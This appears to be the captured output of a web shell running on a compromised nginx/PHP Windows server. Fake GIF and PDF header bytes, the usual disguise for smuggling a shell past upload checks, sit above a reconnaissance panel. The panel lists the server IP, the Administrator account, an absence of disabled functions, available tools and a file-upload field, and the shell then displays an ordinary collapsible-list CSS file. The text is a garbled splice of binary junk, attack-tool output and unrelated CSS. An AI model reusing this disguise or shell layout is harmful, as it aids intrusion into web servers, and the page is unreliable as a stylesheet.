GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/css/ |
Upload File : |
@charset "utf-8"; /* schedule.css */ ol.collapsed, ul.collapsed { display: none; } li.collapsible > span, li.collapsed > span { border-bottom: 1px dotted black; } li.collapsible > span:after, li.collapsed > span:after { /**/transform-origin:25% 50%;/**/ /**/border: 6px solid transparent;/**/ /**/border-width: 6px 12px; /**/ /**/border-left-color: silver;/**/ margin-left: 2px; width: 0; height: 0; display: inline-block; text-align: center; content: ''; -webkit-transition:all .1s ease; -moz-transition:all .1s ease; -o-transition:all .1s ease; transition:all .1s ease; position: absolute; margin-top: .5em; transform: rotate(90deg); } li.collapsible > span:after { transform: rotate(-90deg); margin-top: .4em; /*margin-top: .3em; /*margin-top: 6px; margin-left: -25px;*/ }